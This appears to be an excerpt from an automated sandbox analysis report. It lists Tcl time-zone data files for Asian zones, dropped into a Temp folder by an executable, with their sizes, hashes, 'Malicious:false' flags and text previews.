                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Aqtobe) {. {-9223372036854775808 13720 0 LMT}. {-1441165720 14400 0 AKTT}. {-1247544000 18000 0 AKTT}. {354913200 21600 1 AKTST}. {370720800 21600 0 AKTT}. {386445600 18000 0 AKTT}. {386449200 21600 1 AKTST}. {402256800 18000 0 AKTT}. {417985200 21600 1 AKTST}. {433792800 18000 0 AKTT}. {449607600 21600 1 AKTST}. {465339600 18000 0 AKTT}. {481064400 21600 1 AKTST}. {496789200 18000 0 AKTT}. {512514000 21600 1 AKTST}. {528238800 18000 0 AKTT}. {543963600 21600 1 AKTST}. {559688400 18000 0 AKTT}. {575413200 21600 1 AKTST}. {591138000 18000 0 AKTT}. {606862800 21600 1 AKTST}. {622587600 18000 0 AKTT}. {638312400 21600 1 AKTST}. {654642000 18000 0 AKTT}. {662670000 18000 0 AKTT}. {692823600 18000 0 AQTT}. {701805600 21600 1 AQTST}. {717526800 18000 0 AQTT}. {733266000 21600 1 AQTST}. {748990800 18000 0 AQTT}. {764715600 21600 1 AQTST}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):883
                                                                                                                                                                                                                                                    Entropy (8bit):4.093280687935826
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Ashgabat) {. {-9223372036854775808 14012 0 LMT}. {-1441166012 14400 0 ASHT}. {-1247544000 18000 0 ASHT}. {354913200 21600 1 ASHST}. {370720800 18000 0 ASHT}. {386449200 21600 1 ASHST}. {402256800 18000 0 ASHT}. {417985200 21600 1 ASHST}. {433792800 18000 0 ASHT}. {449607600 21600 1 ASHST}. {465339600 18000 0 ASHT}. {481064400 21600 1 ASHST}. {496789200 18000 0 ASHT}. {512514000 21600 1 ASHST}. {528238800 18000 0 ASHT}. {543963600 21600 1 ASHST}. {559688400 18000 0 ASHT}. {575413200 21600 1 ASHST}. {591138000 18000 0 ASHT}. {606862800 21600 1 ASHST}. {622587600 18000 0 ASHT}. {638312400 21600 1 ASHST}. {654642000 18000 0 ASHT}. {670366800 14400 0 ASHT}. {670370400 18000 1 ASHST}. {686095200 14400 0 ASHT}. {695772000 18000 0 TMT}.}.
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):177
Entropy (8bit):4.750782589043179
Encrypted:false
SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8xEYM4DdVAIgN/ZEYvCHt2WFKUNSH+WFKYEYMvn:SlSWB9IZaM3yRhVAIgH1CHt2wKUNSewa
MD5:73E1F618FB430C503A1499E3A0298C97
SHA1:29F31A7C9992F9D9B3447FCBC878F1AF8E4BD57F
SHA-256:5917FC603270C0470D2EC416E6C85E999A52B6A384A2E1C5CFC41B29ABCA963A
SHA-512:FAE39F158A4F47B4C37277A1DC77B8524DD4287EBAD5D8E6CBB906184E6DA275A308B55051114F4CD4908B449AE3C8FD48384271E3F7106801AD765E5958B4DD
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Ashgabat)]} {. LoadTimeZoneFile Asia/Ashgabat.}.set TZData(:Asia/Ashkhabad) $TZData(:Asia/Ashgabat).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):1643
Entropy (8bit):3.8265567749629983
Encrypted:false
SSDEEP:24:cQcTe0yFHi6Uf4DUfKUfKmF7mUffcqbUfgNqcUfZUfKUfAaUfaMZUflCUfzbS/UY:5cpmpPmFrLNquvStD1XJtgCx
MD5:7A1020270EA06F2E77AC92F960A6D389
SHA1:DD47A64D16E9E95FE42650B38AAC422E011EF51F
SHA-256:C15E1710D2287D9D05D22F8F594BBFDAC8C890F84DCADB4EB833177FE4B27627
SHA-512:C654A32D668121CE4F6D041520CD588E10698DAF85BF187C2FCB97FB0982934D7C4A252A2044ED806828F5EC4713652C5F45B22B3A22073DAD9897097BD4652B
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Baghdad) {. {-9223372036854775808 10660 0 LMT}. {-2524532260 10656 0 BMT}. {-1641005856 10800 0 AST}. {389048400 14400 0 ADT}. {402264000 10800 0 AST}. {417906000 14400 1 ADT}. {433800000 10800 0 AST}. {449614800 14400 1 ADT}. {465422400 10800 0 AST}. {481150800 14400 1 ADT}. {496792800 10800 0 AST}. {512517600 14400 1 ADT}. {528242400 10800 0 AST}. {543967200 14400 1 ADT}. {559692000 10800 0 AST}. {575416800 14400 1 ADT}. {591141600 10800 0 AST}. {606866400 14400 1 ADT}. {622591200 10800 0 AST}. {638316000 14400 1 ADT}. {654645600 10800 0 AST}. {670464000 14400 1 ADT}. {686275200 10800 0 AST}. {702086400 14400 1 ADT}. {717897600 10800 0 AST}. {733622400 14400 1 ADT}. {749433600 10800 0 AST}. {765158400 14400 1 ADT}. {780969600 10800 0 AST}. {796694400 14400 1 ADT}. {812505600 10800 0 AST}. {828316800 14400 1 ADT}. {844128000 1
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):166
Entropy (8bit):4.732157428331905
Encrypted:false
SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8hHVAIgNvZAvxL2WFKENUKMFB/4WFKKu:SlSWB9IZaM3yBHVAIgPAvxL2wKENUr/i
MD5:6291D60E3A30B76FEB491CB944BC2003
SHA1:3D31032CF518A712FBA49DEC42FF3D99DD468140
SHA-256:A462F83DDB0CCC41AC10E0B5B98287B4D89DA8BBBCA869CCFB81979C70613C6C
SHA-512:C62D44527EAD47D2281FF951B9CF84C297859CFDC9A497CB92A583B6012B2B9DAAE9924EF17BC6B7CD317B770FF4924D8E1E77ED2E0EBC02502530D132EDE35B
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Qatar)]} {. LoadTimeZoneFile Asia/Qatar.}.set TZData(:Asia/Bahrain) $TZData(:Asia/Qatar).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):7087
Entropy (8bit):3.7112129677911785
Encrypted:false
SSDEEP:96:7CbMFbN5FMhBnLT9Eb82WFddWqgYL2WCQotwY2hssmC1j+IqgzbiSjMAL3Bd8:7nFXFKBdEb82WFddfgYMQUwYpCuW3Bq
MD5:D5493186CFA8CBA38FEF6CB2B8D58F66
SHA1:6FE30365F3BADC12337E62387D2DC5D1590E462B
SHA-256:1442701FDDE072F3ED533586A641ECBB1EAF5930DF57C4D170910B2403678C09
SHA-512:CED2D4C1B69EF46968E81AA7BFC8177425FB63AE2B8DBEDC71A3F3A428EB7DB08AC72F240CEEC951B1A00FCD64922B104CD7A564FA7A966AA3C3BAEC75E516B5
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Baku) {. {-9223372036854775808 11964 0 LMT}. {-1441163964 10800 0 BAKT}. {-405140400 14400 0 BAKT}. {354916800 18000 1 BAKST}. {370724400 14400 0 BAKT}. {386452800 18000 1 BAKST}. {402260400 14400 0 BAKT}. {417988800 18000 1 BAKST}. {433796400 14400 0 BAKT}. {449611200 18000 1 BAKST}. {465343200 14400 0 BAKT}. {481068000 18000 1 BAKST}. {496792800 14400 0 BAKT}. {512517600 18000 1 BAKST}. {528242400 14400 0 BAKT}. {543967200 18000 1 BAKST}. {559692000 14400 0 BAKT}. {575416800 18000 1 BAKST}. {591141600 14400 0 BAKT}. {606866400 18000 1 BAKST}. {622591200 14400 0 BAKT}. {638316000 18000 1 BAKST}. {654645600 14400 0 BAKT}. {670370400 14400 1 BAKST}. {683496000 14400 0 AZST}. {686098800 10800 0 AZT}. {701812800 14400 1 AZST}. {717537600 14400 0 AZT}. {820440000 14400 0 AZT}. {828234000 18000 1 AZST}. {846378000 14400 0 AZT}. {852062
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):174
Entropy (8bit):4.870101193174299
Encrypted:false
SSDEEP:3:SlEVFRKvJT8QFx52WFKELYOUXGm2OHB+kevXZKmrROpDvFFsQ+8EXV8GCCn:SlSWB9X52wKELPm2OHxePZ3FO1Rb+2GL
MD5:9547C9173AA853C298ECEEFD6CB66A7C
SHA1:B9A17A14F652E3C22AE9552F93F0C7F8EE5E8444
SHA-256:BE7B9D93A7EF23A2EF6CC90AB85001B66E4D37F314FFCEA0E36A4E1F625D1DDD
SHA-512:FB984DC7DA388F68437545560AF0CE0952474C72811673DCBC4EC73BFEC4E7A985F459BDB3D5EF47A83B0731D203AF1F66D8DBD13CB8B3ED6A4041E7C2165E43
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Bangkok) {. {-9223372036854775808 24124 0 LMT}. {-2840164924 24124 0 BMT}. {-1570084924 25200 0 ICT}.}.
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):7754
Entropy (8bit):3.6329631010207892
Encrypted:false
SSDEEP:96:OnQv8iPC28v82K/w1VxDmsCZgV+f7dIWDkLDo1WlqCTpXxcKvjRQZwtPEWRTvS4y:OQjPCL5VxKWC7dIWDkLDoqphsX
MD5:2D3AE4AD36BD5F302F980EB5F1DD0E4A
SHA1:02244056D6D4EC57937D1E187CC65E8FD18F67F0
SHA-256:E9DD371FA47F8EF1BE04109F0FD3EBD9FC5E2B0A12C0630CDD20099C838CBEBB
SHA-512:2E4528254102210B8A9A2263A8A8E72774D40F57C2431C2DD6B1761CD91FB6CEA1FAD23877E1E2D86217609882F3605D7FE477B771A398F91F8D8AD3EAF90BAC
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Beirut) {. {-9223372036854775808 8520 0 LMT}. {-2840149320 7200 0 EET}. {-1570413600 10800 1 EEST}. {-1552186800 7200 0 EET}. {-1538359200 10800 1 EEST}. {-1522551600 7200 0 EET}. {-1507514400 10800 1 EEST}. {-1490583600 7200 0 EET}. {-1473645600 10800 1 EEST}. {-1460948400 7200 0 EET}. {-399866400 10800 1 EEST}. {-386650800 7200 0 EET}. {-368330400 10800 1 EEST}. {-355114800 7200 0 EET}. {-336794400 10800 1 EEST}. {-323578800 7200 0 EET}. {-305172000 10800 1 EEST}. {-291956400 7200 0 EET}. {-273636000 10800 1 EEST}. {-260420400 7200 0 EET}. {78012000 10800 1 EEST}. {86734800 7200 0 EET}. {105055200 10800 1 EEST}. {118270800 7200 0 EET}. {136591200 10800 1 EEST}. {149806800 7200 0 EET}. {168127200 10800 1 EEST}. {181342800 7200 0 EET}. {199749600 10800 1 EEST}. {212965200 7200 0 EET}. {231285600 10800 1 EEST}. {244501200 7200 0 EE
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1631
                                                                                                                                                                                                                                                    Entropy (8bit):4.017458953208438
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Bishkek) {. {-9223372036854775808 17904 0 LMT}. {-1441169904 18000 0 FRUT}. {-1247547600 21600 0 FRUT}. {354909600 25200 1 FRUST}. {370717200 21600 0 FRUT}. {386445600 25200 1 FRUST}. {402253200 21600 0 FRUT}. {417981600 25200 1 FRUST}. {433789200 21600 0 FRUT}. {449604000 25200 1 FRUST}. {465336000 21600 0 FRUT}. {481060800 25200 1 FRUST}. {496785600 21600 0 FRUT}. {512510400 25200 1 FRUST}. {528235200 21600 0 FRUT}. {543960000 25200 1 FRUST}. {559684800 21600 0 FRUT}. {575409600 25200 1 FRUST}. {591134400 21600 0 FRUT}. {606859200 25200 1 FRUST}. {622584000 21600 0 FRUT}. {638308800 25200 1 FRUST}. {654638400 21600 0 FRUT}. {670363200 21600 1 FRUST}. {683582400 21600 0 KGT}. {703018800 21600 1 KGST}. {717530400 18000 0 KGT}. {734468400 21600 1 KGST}. {748980000 18000 0 KGT}. {765918000 21600 1 KGST}. {780429600 18000 0 KGT}. {79
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):173
                                                                                                                                                                                                                                                    Entropy (8bit):4.8522836687190525
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Brunei) {. {-9223372036854775808 27580 0 LMT}. {-1383464380 27000 0 BNT}. {-1167636600 28800 0 BNT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):173
                                                                                                                                                                                                                                                    Entropy (8bit):4.721946029615065
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Kolkata)]} {. LoadTimeZoneFile Asia/Kolkata.}.set TZData(:Asia/Calcutta) $TZData(:Asia/Kolkata).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2090
                                                                                                                                                                                                                                                    Entropy (8bit):3.9498956855700444
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Chita) {. {-9223372036854775808 27232 0 LMT}. {-1579419232 28800 0 YAKT}. {-1247558400 32400 0 YAKMMTT}. {354898800 36000 1 YAKST}. {370706400 32400 0 YAKT}. {386434800 36000 1 YAKST}. {402242400 32400 0 YAKT}. {417970800 36000 1 YAKST}. {433778400 32400 0 YAKT}. {449593200 36000 1 YAKST}. {465325200 32400 0 YAKT}. {481050000 36000 1 YAKST}. {496774800 32400 0 YAKT}. {512499600 36000 1 YAKST}. {528224400 32400 0 YAKT}. {543949200 36000 1 YAKST}. {559674000 32400 0 YAKT}. {575398800 36000 1 YAKST}. {591123600 32400 0 YAKT}. {606848400 36000 1 YAKST}. {622573200 32400 0 YAKT}. {638298000 36000 1 YAKST}. {654627600 32400 0 YAKT}. {670352400 28800 0 YAKMMTT}. {670356000 32400 1 YAKST}. {686080800 28800 0 YAKT}. {695757600 32400 0 YAKMMTT}. {701791200 36000 1 YAKST}. {717512400 32400 0 YAKT}. {733251600 36000 1 YAKST}. {748976400 32400 0
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6701
                                                                                                                                                                                                                                                    Entropy (8bit):3.8331445858334243
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Choibalsan) {. {-9223372036854775808 27480 0 LMT}. {-2032933080 25200 0 ULAT}. {252435600 28800 0 ULAT}. {417974400 36000 0 CHOST}. {433778400 32400 0 CHOT}. {449593200 36000 1 CHOST}. {465314400 32400 0 CHOT}. {481042800 36000 1 CHOST}. {496764000 32400 0 CHOT}. {512492400 36000 1 CHOST}. {528213600 32400 0 CHOT}. {543942000 36000 1 CHOST}. {559663200 32400 0 CHOT}. {575391600 36000 1 CHOST}. {591112800 32400 0 CHOT}. {606841200 36000 1 CHOST}. {622562400 32400 0 CHOT}. {638290800 36000 1 CHOST}. {654616800 32400 0 CHOT}. {670345200 36000 1 CHOST}. {686066400 32400 0 CHOT}. {701794800 36000 1 CHOST}. {717516000 32400 0 CHOT}. {733244400 36000 1 CHOST}. {748965600 32400 0 CHOT}. {764694000 36000 1 CHOST}. {780415200 32400 0 CHOT}. {796143600 36000 1 CHOST}. {811864800 32400 0 CHOT}. {828198000 36000 1 CHOST}. {843919200 32400 0 CHOT}
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):177
                                                                                                                                                                                                                                                    Entropy (8bit):4.815975603028152
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Shanghai)]} {. LoadTimeZoneFile Asia/Shanghai.}.set TZData(:Asia/Chongqing) $TZData(:Asia/Shanghai).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):177
                                                                                                                                                                                                                                                    Entropy (8bit):4.840543487466552
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Shanghai)]} {. LoadTimeZoneFile Asia/Shanghai.}.set TZData(:Asia/Chungking) $TZData(:Asia/Shanghai).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):347
                                                                                                                                                                                                                                                    Entropy (8bit):4.548956625397722
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Colombo) {. {-9223372036854775808 19164 0 LMT}. {-2840159964 19172 0 MMT}. {-2019705572 19800 0 IST}. {-883287000 21600 1 IHST}. {-862639200 23400 1 IST}. {-764051400 19800 0 IST}. {832962600 23400 0 LKT}. {846266400 21600 0 LKT}. {1145039400 19800 0 IST}.}.
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):164
Entropy (8bit):4.733855608307331
Encrypted:false
SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8ntdVAIgN6Ko2WFK1S2WFKwu:SlSWB9IZaM3yHtdVAIgMKo2wKM2wKwu
MD5:629FC03B52D24615FB052C84B0F30452
SHA1:80D24B1A70FC568AB9C555BD1CC70C17571F6061
SHA-256:BD3E4EE002AFF8F84E74A6D53E08AF5B5F2CAF2B06C9E70B64B05FC8F0B6CA99
SHA-512:1C912A5F323E84A82D60300F6AC55892F870974D4DEFE0AF0B8F6A87867A176D3F8D66C1A5B11D8560F549D738FFE377DC20EB055182615062D4649BBA011F32
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Dhaka)]} {. LoadTimeZoneFile Asia/Dhaka.}.set TZData(:Asia/Dacca) $TZData(:Asia/Dhaka).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):8031
Entropy (8bit):3.629699951300869
Encrypted:false
SSDEEP:96:zY75F5VoNVIkbl3IUQZufk0Eej4YWuM0c5/61a7/VGfV8SbU5J3Mirmgs3LmiK:zI75KN+YlgYE+4YWPB6O4in9
MD5:202E5950F6324878B0E6FD0056D2F186
SHA1:A668D4DC3E73A292728CCE136EFFAC95D5952A81
SHA-256:3BB43B71FF807AA3BF6A7F94680FB8BD586A1471218307A6A7A4CE73A5A3A55E
SHA-512:5F9A7308E9C08267ECB8D502505EF9B32269D62FA490D6BC01F6927CB8D5B40CA17BB0CDFA3EE78D48C7686EAA7FD266666EB80E54125859F86CADFD7366DB6B
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Damascus) {. {-9223372036854775808 8712 0 LMT}. {-1577931912 7200 0 EET}. {-1568592000 10800 1 EEST}. {-1554080400 7200 0 EET}. {-1537142400 10800 1 EEST}. {-1522630800 7200 0 EET}. {-1505692800 10800 1 EEST}. {-1491181200 7200 0 EET}. {-1474243200 10800 1 EEST}. {-1459126800 7200 0 EET}. {-242265600 10800 1 EEST}. {-228877200 7200 0 EET}. {-210556800 10800 1 EEST}. {-197427600 7200 0 EET}. {-178934400 10800 1 EEST}. {-165718800 7200 0 EET}. {-147398400 10800 1 EEST}. {-134269200 7200 0 EET}. {-116467200 10800 1 EEST}. {-102646800 7200 0 EET}. {-84326400 10800 1 EEST}. {-71110800 7200 0 EET}. {-52704000 10800 1 EEST}. {-39488400 7200 0 EET}. {-21168000 10800 1 EEST}. {-7952400 7200 0 EET}. {10368000 10800 1 EEST}. {23583600 7200 0 EET}. {41904000 10800 1 EEST}. {55119600 7200 0 EET}. {73526400 10800 1 EEST}. {86742000 7200 0 EET}.
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):376
Entropy (8bit):4.4806884108572715
Encrypted:false
SSDEEP:6:SlSWB9X52wKwfTm2OHEmVFnP9vX+H7MsckVVFJGTL/FG/MEy/ENBErSv/bi/Sv/r:MBp52YfTmdHzdP9P+bXvJGnQt5NBE27J
MD5:172F54D3F87F90D05B3C1FB892B71CDE
SHA1:4C9F076059C7218B187644EEA54639510D6BB9D7
SHA-256:0383148A64879F8050CEE62381B9B0AB7FD303EE535FF81EF9918FDAAC41B750
SHA-512:C9ADF89EDD6F670C35AAE4FD9B6456811E94C68A6FF0BED154C6F6FC7B3FA40A5B61E35CB28C49A31D28DEEE7E9F7F7802441DDDD58BD48518A284878A4DF380
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Dhaka) {. {-9223372036854775808 21700 0 LMT}. {-2524543300 21200 0 HMT}. {-891582800 23400 0 BURT}. {-872058600 19800 0 IST}. {-862637400 23400 0 BURT}. {-576138600 21600 0 DACT}. {38772000 21600 0 BDT}. {1230746400 21600 0 BDT}. {1245430800 25200 1 BDST}. {1262278800 21600 0 BDT}.}.
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):256
Entropy (8bit):4.587835731879361
Encrypted:false
SSDEEP:6:SlSWB9X52wKCXeLm2OHnBGeV8/lvyvmnvQ/9Px31avQC:MBp52qXEmdHnBvVYyaG38F
MD5:7F9C5A6B8E4EDE1CE42C6A9425328034
SHA1:A6587A76395EFDA2B943015BF3DE4205FFEFEC19
SHA-256:B534BF388636D6A03423E81D98B1FEFC54008EC787BDDF911FF84F9743A1CB65
SHA-512:64A93AF638E6BDC17DE1A9B516DBA2445FF1FC68DE1D204F1A12A77AB326273D3D47C6ACD7DBE12474B3E46299C80D3E3A85261A0D2CE47A1C0002CE6BDAF4FB
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Dili) {. {-9223372036854775808 30140 0 LMT}. {-1830414140 28800 0 TLT}. {-879152400 32400 0 JST}. {-766054800 32400 0 TLT}. {199897200 28800 0 WITA}. {969120000 32400 0 TLT}.}.
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):142
Entropy (8bit):4.963122715057284
Encrypted:false
SSDEEP:3:SlEVFRKvJT8QFx52WFKQiXGm2OHvkdvUQK23NVVL:SlSWB9X52wKQZm2OHvsRVNzL
MD5:2B181DB4C9B360B5B7373DB8A70F47AA
SHA1:E0A840BF9C5D4C13A29040E5DD7C03D566C8A73E
SHA-256:061F12109C47BC58000693ACDFA1358CBD88A9D9F6784913C177B623320D793D
SHA-512:2DC3F62E87A2A52249EABB3164DCE3F295426A0DE514DAAA05309F1676478CAC0A6B2CC14F8578E20E3806AB61A867968050588D8A0C5AAE6900B4203E82D4BA
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Dubai) {. {-9223372036854775808 13272 0 LMT}. {-1577936472 14400 0 GST}.}.
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):825
Entropy (8bit):4.144027251159681
Encrypted:false
SSDEEP:24:cQJeOhnLzFC5+qsnDMg4NjJMtW90cTyTi8GL:5J7qR9xWu/
MD5:C7218D3EE62FB80760364BB9B702E60D
SHA1:22E4F10B09074BE08FFA6E1531D06131B2B7BEDB
SHA-256:7E98FA8D65FC458F1C60916A8ED629D0672901153AFA88CB31D7722906411F9C
SHA-512:E1B62FAE2B801D82DAEE06339EA02774B9B17518D1C5197C145C101687D7E6058EDDC69BF7750DBBA49B9208FAB74FA5017826ACBEFE133F9D7A3C1245067038
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Dushanbe) {. {-9223372036854775808 16512 0 LMT}. {-1441168512 18000 0 DUST}. {-1247547600 21600 0 DUST}. {354909600 25200 1 DUSST}. {370717200 21600 0 DUST}. {386445600 25200 1 DUSST}. {402253200 21600 0 DUST}. {417981600 25200 1 DUSST}. {433789200 21600 0 DUST}. {449604000 25200 1 DUSST}. {465336000 21600 0 DUST}. {481060800 25200 1 DUSST}. {496785600 21600 0 DUST}. {512510400 25200 1 DUSST}. {528235200 21600 0 DUST}. {543960000 25200 1 DUSST}. {559684800 21600 0 DUST}. {575409600 25200 1 DUSST}. {591134400 21600 0 DUST}. {606859200 25200 1 DUSST}. {622584000 21600 0 DUST}. {638308800 25200 1 DUSST}. {654638400 21600 0 DUST}. {670363200 21600 1 DUSST}. {684363600 18000 0 TJT}.}.
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):7963
Entropy (8bit):3.6563447381676975
Encrypted:false
SSDEEP:96:uRGaKoVy0FUeLR2S5nfclzdVYi8x6PxGtv2h4WS+MjSIRY7a4sqwQu+RvgrSUt5F:uR7Vy0WetivMXGIRY7a45zmr99Xb
MD5:8A67907EF66B0608A18CAA6FFCC833AD
SHA1:5B4570AEE415E1AC4351ABD2350EE53D5D73DE6D
SHA-256:2D9CC88561AE506A9AC50E98B2F65DC776EC3852D8FDF2BADD7051BBC6446241
SHA-512:F9F3A9B6752384B25F219C4FA01E97976D66C5163E65555866FB166B9EDB4369049590E692341E3C7BCFBA89A864123159C03736C35564FDCF4238CCFE0746DC
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Gaza) {. {-9223372036854775808 8272 0 LMT}. {-2185409872 7200 0 EET}. {-933645600 10800 1 EET}. {-857358000 7200 0 EET}. {-844300800 10800 1 EET}. {-825822000 7200 0 EET}. {-812685600 10800 1 EET}. {-794199600 7200 0 EET}. {-779853600 10800 1 EET}. {-762656400 7200 0 EET}. {-748310400 10800 1 EET}. {-731127600 7200 0 EET}. {-682653600 7200 0 EET}. {-399088800 10800 1 EEST}. {-386650800 7200 0 EET}. {-368330400 10800 1 EEST}. {-355114800 7200 0 EET}. {-336790800 10800 1 EEST}. {-323654400 7200 0 EET}. {-305168400 10800 1 EEST}. {-292032000 7200 0 EET}. {-273632400 10800 1 EEST}. {-260496000 7200 0 EET}. {-242096400 10800 1 EEST}. {-228960000 7200 0 EET}. {-210560400 10800 1 EEST}. {-197424000 7200 0 EET}. {-178938000 10800 1 EEST}. {-165801600 7200 0 EET}. {-147402000 10800 1 EEST}. {-134265600 7200 0 EET}. {-115866000 10800 1 EEST
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):174
                                                                                                                                                                                                                                                    Entropy (8bit):4.814799933523261
